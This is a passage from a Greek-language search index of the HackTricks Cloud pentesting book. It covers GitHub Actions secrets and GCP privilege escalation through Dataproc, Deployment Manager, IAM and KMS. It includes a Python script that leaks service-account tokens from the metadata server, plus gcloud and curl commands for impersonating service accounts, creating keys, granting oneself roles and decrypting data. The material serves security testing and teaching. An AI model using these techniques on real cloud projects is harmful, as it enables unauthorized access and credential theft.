βρίσκονται κάτω από .github/workflows. Όταν ενεργοποιηθεί, η εργασία της pipeline τραβά τον κώδικα από την επιλεγμένη πηγή (π.χ. commit / branch), και εκτελεί τις εντολές που καθορίζονται στο αρχείο διαμόρφωσης CI σε αυτόν τον κώδικα. Επομένως, ο τελικός στόχος του επιτιθέμενου είναι να συμβιβάσει με κάποιο τρόπο αυτά τα αρχεία διαμόρφωσης ή τις εντολές που εκτελούν .","breadcrumbs":"Pentesting CI/CD Methodology » Pipelines Pentesting Methodology","id":"10","title":"Pipelines Pentesting Methodology"},"100":{"body":"Στο https://github.com/organizations//settings/actions είναι δυνατό να ελέγξετε τη διαμόρφωση των ενεργειών github για την οργάνωση. Είναι δυνατόν να απαγορεύσετε τη χρήση των ενεργειών github εντελώς, να επιτρέψετε όλες τις ενέργειες github , ή να επιτρέψετε μόνο ορισμένες ενέργειες. Είναι επίσης δυνατό να διαμορφώσετε ποιος χρειάζεται έγκριση για να εκτελέσει μια ενέργεια Github και τα δικαιώματα του GITHUB_TOKEN μιας ενέργειας Github όταν εκτελείται.","breadcrumbs":"Github Security » Basic Github Information » Διαμόρφωση","id":"100","title":"Διαμόρφωση"},"1000":{"body":"Reading time: 2 minutes tip Μάθετε & εξασκηθείτε στο AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Υποστηρίξτε το HackTricks Ελέγξτε τα σχέδια συνδρομής ! Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live . Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Dataproc Privesc » GCP Dataproc Privilege Escalation","id":"1000","title":"GCP Dataproc Privilege Escalation"},"1001":{"body":"GCP - Dataproc Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Dataproc Privesc » Dataproc","id":"1001","title":"Dataproc"},"1002":{"body":"Δεν μπόρεσα να αποκτήσω ένα reverse shell χρησιμοποιώντας αυτή τη μέθοδο, ωστόσο είναι δυνατό να διαρρεύσει το SA token από το endpoint μεταδεδομένων χρησιμοποιώντας τη μέθοδο που περιγράφεται παρακάτω. Βήματα για εκμετάλλευση Τοποθετήστε το script εργασίας στο GCP Bucket Υποβάλετε μια εργασία σε ένα Dataproc cluster. Χρησιμοποιήστε την εργασία για να αποκτήσετε πρόσβαση στον διακομιστή μεταδεδομένων. Διαρρεύστε το token του service account που χρησιμοποιείται από το cluster. python import requests metadata_url = \"http://metadata/computeMetadata/v1/instance/service-accounts/default/token\"\nheaders = {\"Metadata-Flavor\": \"Google\"} def fetch_metadata_token():\ntry:\nresponse = requests.get(metadata_url, headers=headers, timeout=5)\nresponse.raise_for_status()\ntoken = response.json().get(\"access_token\", \"\")\nprint(f\"Leaked Token: {token}\")\nreturn token\nexcept Exception as e:\nprint(f\"Error fetching metadata token: {e}\")\nreturn None if __name__ == \"__main__\":\nfetch_metadata_token() bash # Copy the script to the storage bucket\ngsutil cp gs:/// # Submit the malicious job\ngcloud dataproc jobs submit pyspark gs:/// \\\n--cluster= \\\n--region= tip Μάθετε & εξασκηθείτε στο AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Υποστηρίξτε το HackTricks Ελέγξτε τα σχέδια συνδρομής ! Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live . Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Dataproc Privesc » dataproc.clusters.get, dataproc.clusters.use, dataproc.jobs.create, dataproc.jobs.get, dataproc.jobs.list, storage.objects.create, storage.objects.get","id":"1002","title":"dataproc.clusters.get, dataproc.clusters.use, dataproc.jobs.create, dataproc.jobs.get, dataproc.jobs.list, storage.objects.create, storage.objects.get"},"1003":{"body":"Reading time: 2 minutes tip Μάθετε & εξασκηθείτε στο AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Υποστηρίξτε το HackTricks Ελέγξτε τα σχέδια συνδρομής ! Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live . Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » GCP - Deploymentmaneger Privesc","id":"1003","title":"GCP - Deploymentmaneger Privesc"},"1004":{"body":"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » deploymentmanager","id":"1004","title":"deploymentmanager"},"1005":{"body":"Αυτή η μοναδική άδεια σας επιτρέπει να εκκινήσετε νέες αναπτύξεις πόρων στο GCP με αυθαίρετους λογαριασμούς υπηρεσιών. Μπορείτε, για παράδειγμα, να εκκινήσετε μια υπολογιστική παρουσία με έναν SA για να κλιμακωθείτε σε αυτήν. Μπορείτε στην πραγματικότητα να εκκινήσετε οποιονδήποτε πόρο αναφέρεται στη gcloud deployment-manager types list Στην αρχική έρευνα χρησιμοποιείται το σενάριο για να αναπτυχθεί μια υπολογιστική παρουσία, ωστόσο αυτό το σενάριο δεν θα λειτουργήσει. Ελέγξτε ένα σενάριο για να αυτοματοποιήσετε τη δημιουργία, εκμετάλλευση και καθαρισμό ενός ευάλωτου περιβάλλοντος εδώ .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » deploymentmanager.deployments.create","id":"1005","title":"deploymentmanager.deployments.create"},"1006":{"body":"Αυτό είναι όπως η προηγούμενη κατάχρηση αλλά αντί να δημιουργήσετε μια νέα ανάπτυξη, τροποποιείτε μία ήδη υπάρχουσα (οπότε να είστε προσεκτικοί) Ελέγξτε ένα σενάριο για να αυτοματοποιήσετε τη δημιουργία, εκμετάλλευση και καθαρισμό ενός ευάλωτου περιβάλλοντος εδώ .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » deploymentmanager.deployments.update","id":"1006","title":"deploymentmanager.deployments.update"},"1007":{"body":"Αυτό είναι όπως η προηγούμενη κατάχρηση αλλά αντί να δημιουργήσετε άμεσα μια νέα ανάπτυξη, πρώτα σας δίνει αυτή την πρόσβαση και στη συνέχεια εκμεταλλεύεται την άδεια όπως εξηγήθηκε στην προηγούμενη ενότητα deploymentmanager.deployments.create .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » deploymentmanager.deployments.setIamPolicy","id":"1007","title":"deploymentmanager.deployments.setIamPolicy"},"1008":{"body":"https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/ tip Μάθετε & εξασκηθείτε στο AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Υποστηρίξτε το HackTricks Ελέγξτε τα σχέδια συνδρομής ! Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live . Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Deploymentmaneger Privesc » References","id":"1008","title":"References"},"1009":{"body":"Reading time: 8 minutes tip Μάθετε & εξασκηθείτε στο AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Υποστηρίξτε το HackTricks Ελέγξτε τα σχέδια συνδρομής ! Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live . Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » GCP - IAM Privesc","id":"1009","title":"GCP - IAM Privesc"},"101":{"body":"Οι ενέργειες Github συνήθως χρειάζονται κάποιο είδος μυστικών για να αλληλεπιδράσουν με το github ή τρίτες εφαρμογές. Για να αποφύγετε να τα βάλετε σε καθαρό κείμενο στο αποθετήριο, το github επιτρέπει να τα βάλετε ως Μυστικά . Αυτά τα μυστικά μπορούν να διαμορφωθούν για το αποθετήριο ή για όλη την οργάνωση . Στη συνέχεια, προκειμένου η Ενέργεια να μπορεί να έχει πρόσβαση στο μυστικό , πρέπει να το δηλώσετε ως εξής: yaml steps:\n- name: Hello world action\nwith: # Set the secret as an input\nsuper_secret:${{ secrets.SuperSecret }}\nenv: # Or as an environment variable\nsuper_secret:${{ secrets.SuperSecret }} Παράδειγμα χρησιμοποιώντας Bash yaml steps:\n- shell: bash\nenv: SUPER_SECRET:${{ secrets.SuperSecret }}\nrun: |\nexample-command \"$SUPER_SECRET\" warning Τα μυστικά μπορούν να προσπελαστούν μόνο από τις Github Actions που τα έχουν δηλωμένα. Μόλις ρυθμιστούν στο repo ή στις οργανώσεις, οι χρήστες του github δεν θα μπορούν να τα προσπελάσουν ξανά , θα μπορούν μόνο να τα αλλάξουν . Επομένως, ο μόνος τρόπος να κλέψετε τα μυστικά του github είναι να μπορείτε να έχετε πρόσβαση στη μηχανή που εκτελεί την Github Action (σε αυτή την περίπτωση θα μπορείτε να έχετε πρόσβαση μόνο στα μυστικά που έχουν δηλωθεί για την Action).","breadcrumbs":"Github Security » Basic Github Information » Μυστικά Git","id":"101","title":"Μυστικά Git"},"1010":{"body":"Βρείτε περισσότερες πληροφορίες σχετικά με το IAM στο: GCP - IAM, Principals & Org Policies Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » IAM","id":"1010","title":"IAM"},"1011":{"body":"Ένας επιτιθέμενος με τις αναφερόμενες άδειες θα είναι σε θέση να ενημερώσει έναν ρόλο που έχει ανατεθεί σε εσάς και να σας δώσει επιπλέον άδειες σε άλλους πόρους όπως: bash gcloud iam roles update --project --add-permissions Μπορείτε να βρείτε ένα σενάριο για την αυτοματοποίηση της δημιουργίας, εκμετάλλευσης και καθαρισμού ενός ευάλωτου περιβάλλοντος εδώ και ένα σενάριο python για την κατάχρηση αυτού του προνομίου εδώ . Για περισσότερες πληροφορίες, ελέγξτε την αρχική έρευνα .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.roles.update (iam.roles.get)","id":"1011","title":"iam.roles.update (iam.roles.get)"},"1012":{"body":"Ένας επιτιθέμενος με τα αναφερόμενα δικαιώματα θα είναι σε θέση να ζητήσει ένα διακριτικό πρόσβασης που ανήκει σε έναν Λογαριασμό Υπηρεσίας , επομένως είναι δυνατό να ζητήσει ένα διακριτικό πρόσβασης ενός Λογαριασμού Υπηρεσίας με περισσότερα προνόμια από τα δικά μας. bash gcloud --impersonate-service-account=\"${victim}@${PROJECT_ID}.iam.gserviceaccount.com\" \\\nauth print-access-token Μπορείτε να βρείτε ένα σενάριο για την αυτοματοποίηση της δημιουργίας, εκμετάλλευσης και καθαρισμού ενός ευάλωτου περιβάλλοντος εδώ και ένα σενάριο python για την κατάχρηση αυτού του προνομίου εδώ . Για περισσότερες πληροφορίες, ελέγξτε την αρχική έρευνα .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.getAccessToken (iam.serviceAccounts.get)","id":"1012","title":"iam.serviceAccounts.getAccessToken (iam.serviceAccounts.get)"},"1013":{"body":"Ένας επιτιθέμενος με τα αναφερόμενα δικαιώματα θα είναι σε θέση να δημιουργήσει ένα κλειδί διαχειριζόμενο από τον χρήστη για έναν Λογαριασμό Υπηρεσίας , το οποίο θα μας επιτρέπει να έχουμε πρόσβαση στο GCP ως αυτός ο Λογαριασμός Υπηρεσίας. bash gcloud iam service-accounts keys create --iam-account /tmp/key.json gcloud auth activate-service-account --key-file=sa_cred.json Μπορείτε να βρείτε ένα σενάριο για την αυτοματοποίηση της δημιουργίας, εκμετάλλευσης και καθαρισμού ενός ευάλωτου περιβάλλοντος εδώ και ένα σενάριο python για την κατάχρηση αυτού του προνομίου εδώ . Για περισσότερες πληροφορίες, ελέγξτε την αρχική έρευνα . Σημειώστε ότι iam.serviceAccountKeys.update δεν θα λειτουργήσει για να τροποποιήσει το κλειδί ενός SA, διότι για να το κάνετε αυτό απαιτούνται επίσης τα δικαιώματα iam.serviceAccountKeys.create.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccountKeys.create","id":"1013","title":"iam.serviceAccountKeys.create"},"1014":{"body":"Εάν έχετε την iam.serviceAccounts.implicitDelegation άδεια σε έναν Λογαριασμό Υπηρεσίας που έχει την iam.serviceAccounts.getAccessToken άδεια σε έναν τρίτο Λογαριασμό Υπηρεσίας, τότε μπορείτε να χρησιμοποιήσετε την implicitDelegation για να δημιουργήσετε ένα διακριτικό για αυτόν τον τρίτο Λογαριασμό Υπηρεσίας . Ακολουθεί ένα διάγραμμα για να βοηθήσει στην εξήγηση. Σημειώστε ότι σύμφωνα με την τεκμηρίωση , η εκχώρηση του gcloud λειτουργεί μόνο για τη δημιουργία ενός διακριτικού χρησιμοποιώντας τη μέθοδο generateAccessToken() . Έτσι, εδώ έχετε πώς να αποκτήσετε ένα διακριτικό χρησιμοποιώντας την API απευθείας: bash curl -X POST \\\n'https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/'\"${TARGET_SERVICE_ACCOUNT}\"':generateAccessToken' \\\n-H 'Content-Type: application/json' \\\n-H 'Authorization: Bearer '\"$(gcloud auth print-access-token)\" \\\n-d '{\n\"delegates\": [\"projects/-/serviceAccounts/'\"${DELEGATED_SERVICE_ACCOUNT}\"'\"],\n\"scope\": [\"https://www.googleapis.com/auth/cloud-platform\"]\n}' Μπορείτε να βρείτε ένα σενάριο για την αυτοματοποίηση της δημιουργίας, εκμετάλλευσης και καθαρισμού ενός ευάλωτου περιβάλλοντος εδώ και ένα σενάριο python για την κατάχρηση αυτού του προνομίου εδώ . Για περισσότερες πληροφορίες δείτε την αρχική έρευνα .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.implicitDelegation","id":"1014","title":"iam.serviceAccounts.implicitDelegation"},"1015":{"body":"Ένας επιτιθέμενος με τα αναφερόμενα δικαιώματα θα μπορεί να υπογράφει αυθαίρετα payloads στο GCP . Έτσι, θα είναι δυνατό να δημιουργήσουμε ένα μη υπογεγραμμένο JWT του SA και στη συνέχεια να το στείλουμε ως blob για να υπογραφεί το JWT από το SA που στοχεύουμε. Για περισσότερες πληροφορίες διαβάστε αυτό . Μπορείτε να βρείτε ένα σενάριο για την αυτοματοποίηση της δημιουργίας, εκμετάλλευσης και καθαρισμού ενός ευάλωτου περιβάλλοντος εδώ και ένα σενάριο python για την κατάχρηση αυτού του προνομίου εδώ και εδώ . Για περισσότερες πληροφορίες δείτε την αρχική έρευνα .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.signBlob","id":"1015","title":"iam.serviceAccounts.signBlob"},"1016":{"body":"Ένας επιτιθέμενος με τα αναφερόμενα δικαιώματα θα μπορεί να υπογράφει καλά διαμορφωμένα JSON web tokens (JWTs) . Η διαφορά με την προηγούμενη μέθοδο είναι ότι αντί να κάνουμε την google να υπογράψει ένα blob που περιέχει ένα JWT, χρησιμοποιούμε τη μέθοδο signJWT που ήδη περιμένει ένα JWT . Αυτό διευκολύνει τη χρήση αλλά μπορείτε να υπογράψετε μόνο JWT αντί για οποιαδήποτε bytes. Μπορείτε να βρείτε ένα σενάριο για την αυτοματοποίηση της δημιουργίας, εκμετάλλευσης και καθαρισμού ενός ευάλωτου περιβάλλοντος εδώ και ένα σενάριο python για την κατάχρηση αυτού του προνομίου εδώ . Για περισσότερες πληροφορίες δείτε την αρχική έρευνα .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.signJwt","id":"1016","title":"iam.serviceAccounts.signJwt"},"1017":{"body":"Ένας επιτιθέμενος με τα αναφερόμενα δικαιώματα θα μπορεί να προσθέτει πολιτικές IAM σε λογαριασμούς υπηρεσιών . Μπορείτε να το εκμεταλλευτείτε για να παραχωρήσετε στον εαυτό σας τα δικαιώματα που χρειάζεστε για να προσποιηθείτε τον λογαριασμό υπηρεσίας. Στο παρακάτω παράδειγμα παραχωρούμε στον εαυτό μας τον ρόλο roles/iam.serviceAccountTokenCreator πάνω στον ενδιαφέροντα SA: bash gcloud iam service-accounts add-iam-policy-binding \"${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com\" \\\n--member=\"user:username@domain.com\" \\\n--role=\"roles/iam.serviceAccountTokenCreator\" # If you still have prblem grant yourself also this permission\ngcloud iam service-accounts add-iam-policy-binding \"${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com\" \\ \\\n--member=\"user:username@domain.com\" \\\n--role=\"roles/iam.serviceAccountUser\" Μπορείτε να βρείτε ένα σενάριο για την αυτοματοποίηση της δημιουργίας, εκμετάλλευσης και καθαρισμού ενός ευάλωτου περιβάλλοντος εδώ .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.setIamPolicy","id":"1017","title":"iam.serviceAccounts.setIamPolicy"},"1018":{"body":"Η άδεια iam.serviceAccounts.actAs είναι παρόμοια με την άδεια iam:PassRole από το AWS . Είναι απαραίτητη για την εκτέλεση εργασιών, όπως η εκκίνηση μιας παρουσίας Compute Engine, καθώς παρέχει τη δυνατότητα να \"ενσαρκώνεται\" μια Υπηρεσία Λογαριασμού, διασφαλίζοντας τη διαχείριση των αδειών με ασφάλεια. Χωρίς αυτήν, οι χρήστες μπορεί να αποκτήσουν αδικαιολόγητη πρόσβαση. Επιπλέον, η εκμετάλλευση της iam.serviceAccounts.actAs περιλαμβάνει διάφορες μεθόδους, καθεμία από τις οποίες απαιτεί ένα σύνολο αδειών, σε αντίθεση με άλλες μεθόδους που χρειάζονται μόνο μία. Ενσάρκωση λογαριασμού υπηρεσίας Η ενσάρκωση ενός λογαριασμού υπηρεσίας μπορεί να είναι πολύ χρήσιμη για να αποκτήσετε νέες και καλύτερες άδειες . Υπάρχουν τρεις τρόποι με τους οποίους μπορείτε να ενσαρκώσετε έναν άλλο λογαριασμό υπηρεσίας : Αυθεντικοποίηση χρησιμοποιώντας ιδιωτικά κλειδιά RSA (καλύπτεται παραπάνω) Εξουσιοδότηση χρησιμοποιώντας πολιτικές Cloud IAM (καλύπτεται εδώ) Ανάθεση εργασιών σε υπηρεσίες GCP (πιο σχετική με την παραβίαση ενός λογαριασμού χρήστη)","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.actAs","id":"1018","title":"iam.serviceAccounts.actAs"},"1019":{"body":"Ένας επιτιθέμενος με τις αναφερόμενες άδειες θα είναι σε θέση να δημιουργήσει ένα OpenID JWT. Αυτά χρησιμοποιούνται για να δηλώσουν ταυτότητα και δεν φέρουν απαραίτητα καμία έμμεση εξουσιοδότηση κατά ενός πόρου. Σύμφωνα με αυτήν την ενδιαφέρουσα ανάρτηση , είναι απαραίτητο να υποδείξετε το κοινό (υπηρεσία στην οποία θέλετε να χρησιμοποιήσετε το token για αυθεντικοποίηση) και θα λάβετε ένα JWT υπογεγραμμένο από την google που υποδεικνύει τον λογαριασμό υπηρεσίας και το κοινό του JWT. Μπορείτε να δημιουργήσετε ένα OpenIDToken (αν έχετε την πρόσβαση) με: bash # First activate the SA with iam.serviceAccounts.getOpenIdToken over the other SA\ngcloud auth activate-service-account --key-file=/path/to/svc_account.json\n# Then, generate token\ngcloud auth print-identity-token \"${ATTACK_SA}@${PROJECT_ID}.iam.gserviceaccount.com\" --audiences=https://example.com Μπορείτε απλά να το χρησιμοποιήσετε για να αποκτήσετε πρόσβαση στην υπηρεσία με: bash curl -v -H \"Authorization: Bearer id_token\" https://some-cloud-run-uc.a.run.app Ορισμένες υπηρεσίες που υποστηρίζουν την αυθεντικοποίηση μέσω αυτού του είδους tokens είναι: Google Cloud Run Google Cloud Functions Google Identity Aware Proxy Google Cloud Endpoints (αν χρησιμοποιείτε Google OIDC) Μπορείτε να βρείτε ένα παράδειγμα για το πώς να δημιουργήσετε και να αποκτήσετε ένα OpenID token εκ μέρους ενός service account εδώ .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » iam.serviceAccounts.getOpenIdToken","id":"1019","title":"iam.serviceAccounts.getOpenIdToken"},"102":{"body":"Το Github επιτρέπει τη δημιουργία περιβαλλόντων όπου μπορείτε να αποθηκεύσετε μυστικά . Στη συνέχεια, μπορείτε να δώσετε στην github action πρόσβαση στα μυστικά μέσα στο περιβάλλον με κάτι σαν: yaml jobs:\ndeployment:\nruns-on: ubuntu-latest\nenvironment: env_name Μπορείτε να ρυθμίσετε ένα περιβάλλον να είναι προσβάσιμο από όλα τα branches (προεπιλογή), μόνο από προστατευμένα branches ή να καθορίσετε ποια branches μπορούν να έχουν πρόσβαση σε αυτό. Μπορεί επίσης να ορίσει έναν αριθμό απαιτούμενων αναθεωρήσεων πριν από την εκτέλεση μιας ενέργειας χρησιμοποιώντας ένα περιβάλλον ή να περιμένει κάποιο χρόνο πριν επιτρέψει τις αναπτύξεις να προχωρήσουν.","breadcrumbs":"Github Security » Basic Github Information » Git Environments","id":"102","title":"Git Environments"},"1020":{"body":"https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/ tip Μάθετε & εξασκηθείτε στο AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Υποστηρίξτε το HackTricks Ελέγξτε τα σχέδια συνδρομής ! Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live . Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - IAM Privesc » Αναφορές","id":"1020","title":"Αναφορές"},"1021":{"body":"Reading time: 4 minutes tip Μάθετε & εξασκηθείτε στο AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Υποστηρίξτε το HackTricks Ελέγξτε τα σχέδια συνδρομής ! Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live . Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - KMS Privesc » GCP - KMS Privesc","id":"1021","title":"GCP - KMS Privesc"},"1022":{"body":"Πληροφορίες σχετικά με το KMS: GCP - KMS Enum Σημειώστε ότι στο KMS οι άδειες δεν είναι μόνο κληρονομούμενες από Οργανισμούς, Φάκελους και Έργα αλλά και από Keyrings .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - KMS Privesc » KMS","id":"1022","title":"KMS"},"1023":{"body":"Μπορείτε να χρησιμοποιήσετε αυτή την άδεια για να αποκρυπτογραφήσετε πληροφορίες με το κλειδί που έχετε αυτή την άδεια. bash gcloud kms decrypt \\\n--location=[LOCATION] \\\n--keyring=[KEYRING_NAME] \\\n--key=[KEY_NAME] \\\n--version=[KEY_VERSION] \\\n--ciphertext-file=[ENCRYPTED_FILE_PATH] \\\n--plaintext-file=[DECRYPTED_FILE_PATH]","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - KMS Privesc » cloudkms.cryptoKeyVersions.useToDecrypt","id":"1023","title":"cloudkms.cryptoKeyVersions.useToDecrypt"},"1024":{"body":"Ένας επιτιθέμενος με αυτή την άδεια θα μπορούσε να δώσει στον εαυτό του άδειες για να χρησιμοποιήσει το κλειδί για να αποκρυπτογραφήσει πληροφορίες. bash gcloud kms keys add-iam-policy-binding [KEY_NAME] \\\n--location [LOCATION] \\\n--keyring [KEYRING_NAME] \\\n--member [MEMBER] \\\n--role roles/cloudkms.cryptoKeyDecrypter","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - KMS Privesc » cloudkms.cryptoKeys.setIamPolicy","id":"1024","title":"cloudkms.cryptoKeys.setIamPolicy"},"1025":{"body":"Ακολουθεί μια εννοιολογική ανάλυση του πώς λειτουργεί αυτή η αντιπροσώπευση: Service Account A έχει άμεση πρόσβαση για αποκρυπτογράφηση χρησιμοποιώντας ένα συγκεκριμένο κλειδί στο KMS. Service Account B έχει παραχωρηθεί η άδεια useToDecryptViaDelegation. Αυτό του επιτρέπει να ζητά από το KMS να αποκρυπτογραφήσει δεδομένα εκ μέρους του Service Account A. Η χρήση αυτής της άδειας είναι έμμεση στον τρόπο που η υπηρεσία KMS ελέγχει τις άδειες όταν υποβάλλεται ένα αίτημα αποκρυπτογράφησης. Όταν υποβάλετε ένα τυπικό αίτημα αποκρυπτογράφησης χρησιμοποιώντας το Google Cloud KMS API (σε Python ή άλλη γλώσσα), η υπηρεσία ελέγχει αν ο ζητών λογαριασμός υπηρεσίας έχει τις απαραίτητες άδειες . Εάν το αίτημα υποβάλλεται από έναν λογαριασμό υπηρεσίας με την άδεια useToDecryptViaDelegation , το KMS επαληθεύει αν αυτός ο λογαριασμός επιτρέπεται να ζητήσει αποκρυπτογράφηση εκ μέρους της οντότητας που κατέχει το κλειδί . Setting Up for Delegation Define the Custom Role : Δημιουργήστε ένα αρχείο YAML (π.χ. custom_role.yaml) που ορίζει τον προσαρμοσμένο ρόλο. Αυτό το αρχείο θα πρέπει να περιλαμβάνει την άδεια cloudkms.cryptoKeyVersions.useToDecryptViaDelegation. Ακολουθεί ένα παράδειγμα του πώς μπορεί να φαίνεται αυτό το αρχείο: yaml title: \"KMS Decryption via Delegation\"\ndescription: \"Allows decryption via delegation\"\nstage: \"GA\"\nincludedPermissions:\n- \"cloudkms.cryptoKeyVersions.useToDecryptViaDelegation\" Δημιουργήστε τον Προσαρμοσμένο Ρόλο Χρησιμοποιώντας το gcloud CLI : Χρησιμοποιήστε την παρακάτω εντολή για να δημιουργήσετε τον προσαρμοσμένο ρόλο στο έργο σας στο Google Cloud: bash gcloud iam roles create kms_decryptor_via_delegation --project [YOUR_PROJECT_ID] --file custom_role.yaml Αντικαταστήστε το [YOUR_PROJECT_ID] με το αναγνωριστικό έργου σας στο Google Cloud. Δώστε τον Προσαρμοσμένο Ρόλο σε έναν Λογαριασμό Υπηρεσίας : Αναθέστε τον προσαρμοσμένο ρόλο σας σε έναν λογαριασμό υπηρεσίας που θα χρησιμοποιεί αυτή την άδεια. Χρησιμοποιήστε την παρακάτω εντολή: bash # Give this permission to the service account to impersonate\ngcloud projects add-iam-policy-binding [PROJECT_ID] \\\n--member \"serviceAccount:[SERVICE_ACCOUNT_B_EMAIL]\" \\\n--role \"projects/[PROJECT_ID]/roles/[CUSTOM_ROLE_ID]\" # Give this permission over the project to be able to impersonate any SA\ngcloud projects add-iam-policy-binding [YOUR_PROJECT_ID] \\\n--member=\"serviceAccount:[SERVICE_ACCOUNT_EMAIL]\" \\\n--role=\"projects/[YOUR_PROJECT_ID]/roles/kms_decryptor_via_delegation\" Αντικαταστήστε το [YOUR_PROJECT_ID] και το [SERVICE_ACCOUNT_EMAIL] με το ID του έργου σας και το email του λογαριασμού υπηρεσίας, αντίστοιχα. tip Μάθετε & εξασκηθείτε στο AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Υποστηρίξτε το HackTricks Ελέγξτε τα σχέδια συνδρομής ! Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live . Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - KMS Privesc » cloudkms.cryptoKeyVersions.useToDecryptViaDelegation","id":"1025","title":"cloudkms.cryptoKeyVersions.useToDecryptViaDelegation"},"1026":{"body":"Reading time: 2 minutes tip Μάθετε & εξασκηθείτε στο AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Υποστηρίξτε το HackTricks Ελέγξτε τα σχέδια συνδρομής ! Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live . Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Orgpolicy Privesc » GCP - Orgpolicy Privesc","id":"1026","title":"GCP - Orgpolicy Privesc"},"1027":{"body":"","breadcrumbs":"GCP Pentesting » GCP - Privilege 